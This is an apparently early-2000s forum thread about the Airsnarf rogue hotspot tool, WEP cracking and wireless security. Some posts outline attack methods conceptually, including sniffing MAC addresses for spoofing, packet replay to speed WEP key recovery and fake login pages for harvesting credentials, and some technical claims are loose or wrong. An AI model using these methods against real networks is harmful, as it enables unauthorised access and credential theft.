 
IamZed
Premium
join:2001-01-10
Dayton, OH
| Possible, but not probable The creation of false sign in pages seems a bit obtuse. It’s not something you do as a drive by. I would hope people become familiar enough with this that when everyone is booted, let a sacrificial lamb try to log back on first.
--
A thing worth doing is worth doing to excess. | |
|
 | 
oliphant5
Got Identity?
Premium
join:2003-05-24
Corona, CA
| Re: Possible, but not probable Exactly...this isn't nothing new. This is just a twist on the spoofed email looking for AOLer's account info. Like most "hacks" this requires end user carelessness in order to succeed.
--
Don't get it, demand it! The Anime Network »www.theanimenetwork.com/index.html And something pretty good from the Cooler »elev.ru.orebro.se/ru0369/HAHAHAHA.MPG | |
|
LBDSL
Lightning Bolt
VIP
join:2002-01-07
Auburn Hills, MI | someone will always crack it. No matter what you build, someone will crack it. It is the way the world works
--
Lightning Bolt Technologies | |
|
| 
TexasGuy
49 States And Texas
Premium
join:2002-12-02
Houston, TX
| Re: someone will always crack it. said by LBDSL  :
No matter what you build, someone will crack it. It is the way the world works
Right, go hack 256 bit DES key. Right.  Easier to storm the safe and break it open.
--
Who drank has died, who drinks will die. Is he immortal who is sober? | |
|
skyfreedomdo
Premium
join:2003-01-01
Boise, ID |  What do u mean 802.11b is not secure?!!!
| |
|
| 
ctceo
Premium
join:2001-04-26
South Bend, IN
clubs: | Re: What do u mean 802.11b is not secure?!!! Apparently you need to open your other eye. | |
|
| |
skyfreedomdo
Premium
join:2003-01-01
Boise, ID | Re: What do u mean 802.11b is not secure?!!! | |
|
| | |
ctceo
Premium
join:2001-04-26
South Bend, IN
clubs: | Re: What do u mean 802.11b is not secure?!!! Humor observed... | |
|
| | | | |
kba4
join:2001-10-23
Akron, OH
 ·RoadRunner Cable
| hot-spot providers take heed!! we will not let you provide free/cheap access to just the 'special' individuals you know about! you have been warned!!
seriously, can anyone honesty have expected wi-fi to ever be secure? how can you make a broadcast 'secret' anyway? it's just an arms race between the 'hackers' and the providers/developers... i hope anyone investing in the hot-spot idea knows this going in, and will continue to fund what could someday become a utopia of free access anywhere in the country- even world. i don't care how much you encrypt the data, if it's broadcast, it can be seen by anyone, and the 'hacker' actually prefers not to be paid for his work, unlike the 9-5 sysadmin wo 'secures the network'. oh well, someone with more sense, please add to the discussion, i just saw the story and felt like posting:)
--
the USA is a weapon of mass destruction. | |
|
| 
lazarus_
join:2002-08-31
Resolute, NU
| Re: hot-spot providers take heed!! said by kba4 :
we will not let you provide free/cheap access to just the 'special' individuals you know about! you have been warned!!
seriously, can anyone honesty have expected wi-fi to ever be secure? how can you make a broadcast 'secret' anyway? it's just an arms race between the 'hackers' and the providers/developers... i hope anyone investing in the hot-spot idea knows this going in, and will continue to fund what could someday become a utopia of free access anywhere in the country- even world. i don't care how much you encrypt the data, if it's broadcast, it can be seen by anyone, and the 'hacker' actually prefers not to be paid for his work, unlike the 9-5 sysadmin wo 'secures the network'. oh well, someone with more sense, please add to the discussion, i just saw the story and felt like posting:)
Like my networking prof always says: "Anyone with a wet finger or metal clothing hanger can pickup your signal.."
Using WiFi you have the portability and easy of install but have to give up security.. If you have important info going over the network you should never use WiFi.. | |
|
kapil
The Kapil
join:2000-04-26
Chicago, IL | Where... | |
|
| 
Vamp
5c077
Premium
join:2003-01-28
MD | more hackers by listing the name of the tool publicaly is only educating more people in hacking.. | |
|
| | 
korym
Go Wisp's
ExMod 1999-03
join:1999-12-23
Richmond, VA
clubs: | Re: more hackers Oops. | |
|
| | 
Sisqo
World Champs. Babe Who?
Premium
join:2002-08-14
Methuen, MA
| said by Vamp :
by listing the name of the tool publicaly is only educating more people in hacking..
This stinks, so how can someone really protect themselves? Now does this apply only to users that are using hotspots?
--
No it's not a payphone, it's a portable phone! | |
|
| | | TheNerdShow
join:2003-11-16
Anchorage, AK
edit:
November 26th, @06:54PM
| Re: more hackers This applies to home and business networks using popular wireless networking gear and using a form of encryption or password protection. The issue is moot since most people don't even bother to password protect their networks.
--
»thenerdshow.com »nerds.tk | |
|
| | | 
gdead
@eisg.net
| Defensive Techniques Howdy,
So I've been involved in the Airsnarf project (I presented with Beetle at BlackHat Federal in DC a few months ago on the project). I've got a few things to say about this tool and the write-up about this.
First off, the type of attack that airsnarf carries out is not rocket science. It is not about breaking encryption but rather about tricking the client. The attack can be fully explained in about 5 minutes to a level that anyone with familiarity with 802.11 can fully understand it.
HOWEVER, not a single OS vendor, security tool provider, or driver vendor alert the user that this kind of attack is being performed. This is completely a layer 2 attack that should be caught by any wireless security tool. At the point of our talk at BH, nothing existed that would tell the user "hey, bad things are afoot... you should stop using this network". Airsnarf is a wakeup call to the vendors.
To that end, we also wrote the hotspot defense kit (HSDK). It's designed to alert the user that there is a layer 2 attack underway. It can be downloaded from the airsnaft page. Currently it only runs on OS X, but we are working on a windows port.
Finally, I am not a 3l337 blackhat hacker.  I coauthored 802.11 Security through O'Reilly. I also try to educate as many people as I can about wireless security through talks, mailing lists, etc.
later | |
|
|
korym
Go Wisp's
ExMod 1999-03
join:1999-12-23
Richmond, VA
clubs: | Re: Where... »airsnarf.shmoo.com/
Also check out Airsnort too. | |
|
| 
cinnamon
How Smart Is Your Card?
Premium
join:2002-01-19
Tulsa, OK | Of course from The Shmoo Group. You are running Red Hat Linux 9.0 aren't you? | |
|
| |
| | 
aSic
Premium
join:2001-05-17
Wakulla, FL
clubs: | Re: Where... lol... the video card makes no difference at a command line..
...unless you're the wussy type that *NEEDS* X to do anything useful. | |
|
| | | Mr_Stealth
Premium
join:2001-05-18
Lucasville, OH
clubs:
·RoadRunner Cable
 ·Verizon Online DSL
| Re: Where... lol
I just need to take the time to get it running on command line and then find the drivers
I'm fairly certain there are some working ones available
but I just tried to take the easy way out with Red Hat and Mandrake...got the through the install and gave it me a blank screen when it went to configure the video card
not like we really need to crack WEP keys...from what I have seen, most people don't have enough sense to use it anyway
--
Say goodbye to your privacy and security.
Say no to TCPA/TCG/NGSCB | |
|
skyfreedomdo
Premium
join:2003-01-01
Boise, ID |  How long would it take to...
Any ideas or *shhh* experiences? | |
|
| |
| |
skyfreedomdo
Premium
join:2003-01-01
Boise, ID | Re: How long would it take to...
--
SKYFREEDOM NETWORKS
Whatever the angle; We've got you covered. | |
|
| | |
| | |
skyfreedomdo
Premium
join:2003-01-01
Boise, ID
| Re: How long would it take to... I like MAC Filtering but theres always a chance of MAC SPOOFING!
But you are right common sense and, if I might add, knowledge of the enemy out there or within will prevail.
--
SKYFREEDOM NETWORKS
Whatever the angle; We've got you covered. | |
|
| | | |
| | | | 
BeesTea
Network Janitor
Premium,VIP
join:2003-03-08
00000
| Re: How long would it take to... Sure, changing your MAC is not hard. That isn't spoofing and it isn't "defeating" anything at all. You're literally becoming a device allowed to connect to the WAP. Now here's the interesting part. Can you explain the process of knowing what to set your MAC to in order to gain access to the WAP ?
On the issue of WEP, it isn't intended to provide strong cryptographic communication. WEP means "Wired Equivalent Privacy". That is, just as a wire holds the signal, keeping it from being intercepted easily, WEP keeps signal from being eavesdropped on easily.
This is another example of why the physical layer is NOT where security is applied for the average network. Wireless or otherwise.
Cheers,
-BeesT
--
2b2b2b415448300d | |
|
| | | | | |
| | | | | |
NotAHacker
@dbma.com
| Re: How long would it take to... How hard is it to spoof a MAC address? Well, if you have the software and knowledge to determine WEP keys, you already have everything you need to also learn all the authorized MAC addresses on that WLAN.
I'm not going into further detail, even though the info is widely available on the Internet. | |
|
| | | | | |
BeesTea
Network Janitor
Premium,VIP
join:2003-03-08
00000
edit:
November 26th, @08:10PM
| said by bmn :
It would involve sniffing traffic on that WLAN. You would then be able to detect the MAC address of a system associated with the WLAN that is your target. I haven't actually done it (over the black hat stuff), so the mechanics of doing it are not 100% in my skillset, but the conceptual process can be found elsewhere.
That's an interesting concept. It was my understanding that by frequency variation the clients were not able to see one another, hence the need for a WAP. Does this require the NIC to be in adhoc mode ? I wish I had more than just my laptop running on 802.11 here to play with.
I've been looking for a bit this evening and can't find any method that doesn't require using crazy radio frequency tools. There are some funky white papers on parsing radio streams in the unlicensed frequency ranges but they seem to be more "find the person snooping your cordless phone" type stuff.
If you happen to find anything on this please let me know, as that's not at all how I understood it to operate.
Cheers,
-BeesT
OK, I've scoured the seatle wireless mailing list archive and it seems my understanding of how this works is based on modern 802.11 card implimentations. Newer cards aparently make it non-trivial to intercept packets on the way to the WAP or vice-verse. Presumably older cards with new firmware would also reduce this risk.
--
2b2b2b415448300d | |
|
| | | | | 
sporkme
drop the crantini and move it, sister
Premium,MVM
join:2000-07-01
Netcong, NJ
| said by BeesTea :
Now here's the interesting part. Can you explain the process of knowing what to set your MAC to in order to gain access to the WAP ?
Just run your favorite sniffer for a while. The frame headers are NOT encrypted when WEP is enabled. So it's actually pretty easy. I've been toying with "KisMac" and it's pretty simple. It's totally point-n-drool. Right click on a node and there's a menu item "Find Key". With a moderate amount of traffic this happens in less than a half hour.
WEP is fundamentally broken. I don't mind the idea of encrypting at L2, but they chose a very weak algorithm.
--
just a minute | |
|
| | | | | | 
aitech
Guru. Kneel
join:2000-12-19
Boston, MA
clubs: | Re: How long would it take to... Has anyone gotten a successful port of Kismet into windows yet, or is it still alpha?
And anyone have any idea when netstumbler .4 is coming yet? | |
|
| | | 
DenverDialup
join:2003-06-06
Littleton, CO
clubs:
| Well, consider too that WPA is becoming the new standard in wireless security. I don't see why Shmoo has to go write another hacking/phreaking/wardriving tool to "prove an inherent insecurity in 802.11b"...anyone who's spent more than a day looking at wireless technologies today knows how insecure it is. Why not take that effort and translate it into something more useful -- like actually working to make WiFi more secure?
--
"Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning." -- Rich Cook | |
|
| | | | |
| | | | | shmoe1
join:2003-09-06
Fremont, CA
| Re: How long would it take to... One article about WPA vulnerability I've encountered was by Robert Moskowitz, senior technical director at ICSA Labs.
It details problems with the pre-shared key of less than 20 characters with simple pass phrases that were vulnerable to a dictionary attack. Complex passphrases of longer than 20 characters seem to be less of a security issue.
Also, I also read that WPA is just as vulnerable as WEP to denial-of-service attacks.
If others can point to other articles or specific problems it would be useful.
Thanx | |
|
gruggni
Oxygen Gets You High
join:2003-07-28
Corpus Christi, TX
| No need to panic Tools like this have been around for a while. You only need to use the tool if someone has encryption turn on. Majority of residential wifi networks are already open. Really no need for worries. Very few wifi networks are actually encrypted.
Tools like this are used to break encryption. Anyone with malicious intent will just go to the open wifi network instead of an encrypted one. Breaking encryption takes time.
How else do you test encryption works? You make a tool to break it. If someone is trying to sell me wifi equipment and they say its secure, I want a way to test the encryption instead of taking someones word for it.
--
When I read about the evils of drinking, I gave up reading. --Henny Youngman | |
|
| 
Rhobite
Premium
join:2002-02-24
Cambridge, MA
clubs:
| Re: No need to panic This tool has NOTHING to do with breaking encryption. It's a password-gathering tool, it puts up a fake login page just like you'd get from a T-Mobile or Verizon hotspot. Hotspots don't use WEP or WPA anyway, they are unencrypted. This tool just makes it easy to set up a rogue AP and fish for people's logins. The reason you can't just passively sniff for passwords is that I assume the real login pages are sent over SSL. Although I've never used a pay hotspot so I could be wrong. | |
|
reub2000
Premium
join:2001-12-28
Evanston, IL | I'll continue to use 10/100 Ethernet. This type of attack would be impossible on ethernet. And I get 100Mbps instead of about 50MBps. | |
|
| 
bigdaddy17
join:2003-05-08
Miami, FL | Re: I'll continue to use 10/100 Ethernet. So does this also affect Wireless home networks too? | |
|
| |
reub2000
Premium
join:2001-12-28
Evanston, IL
| Re: I'll continue to use 10/100 Ethernet. said by bigdaddy17 :
So does this also affect Wireless home networks too?
I don't see why it wouldn't, since it's the same standrard. (802.11g/b/a) | |
|
| | |
|
| PhragX
join:2001-11-01
| Re: Playing with stuff Bill doesn't want you to have incorrect - there is a windows port of airsnort (for defeating WEP)
»airsnort.shmoo.com/windows.html
many tools such as ethereal/tcpdump are ported to windows, and there is of course netstumbler.
www.packetstormsecurity.nl have also posted (exploit)code that is easily compiled (or precompiled) for windows systems. | |
|
dilettante
join:2002-01-01
Haslett, MI
| Want security? Just stay under their "radar" I continue to use HomeRF here at home. As far as I know an 802.11 radio can't even see it. It's slow but cheap. Now to get hold of some HomeRF 2 gear!
Just doesn't always pay to be one of the cool kids I guess.
My thanks to Ashcroft or whoever chose to suppress the technology. ...tongue in cheek guys, really! | |
|
mimick
@xx.lax1 | broadband does anyone know how to open up your broad band more to get more speed | |
|
v3xproof
@af.mil
| WEP vs WPA On a not so busy network it could be as little as 15 minutes to crack. The reason why is a little tool called AirReply. A knowledgable person can grab a good packet from the little traffic and just resend it over and over. The AP then send information back over and over (generating tons of initialization vectors needed to crack the WEP key). After about 15 minutes and 300,000 replayed packets later it will only take about 30 seconds to crack the actual key. WPA is way more susceptable to DoS attacks IMHO. Why? Because WPA does not like replay attacks. If it detects one, it will disconnect that user... get the picture. At Defcon the Shmoo Group created a "WiFi Handgrenade". lol. They took a pda and just had it replay all traffic... You take it from there. About actually cracking WPA. I do believe that there is only one weekness with it known as of today (At least with AES, but dont quote me on this)... User's picking weak passkeys which allow it to be cracked with a dictionary file. Choosing a passkey of 60 characters with absolutely no words, numbers, upper/lower case, and special characters will make it take longer to crack. Changing you passkey often should prevent this attack. Mac filtering is bullshit. If you want to get the most secure wireless you can, my suggestion... Use WPA or WPA2 with AES. Make the user then have to VPN to get on the network (Now they have to get creditials). When browsing try to use ssl as much as possible. When chatting, try using an encrypted chat program. Etc... Now about Shmoo, they arent doing what they do to make people's lives miserable; they do it to educate dumb people. People that buy into any corperations bullshit about how secure their wireless products are. And about secure wireless networks... Their is one. Its called SecNet 11. It is what the government uses. I dont know much about it other then what I found on the internet. I know that a single wireless card runs in the thousands. If you want to know why I say its secure (for now) is its approved to transmit up to Secret. I doubt the government would allow that to transmitted over unsecure means (at least I hope not). Hope I helped to clear up some misconceptions. | |
|
| |
|
|
|
Out of Thin Air
·
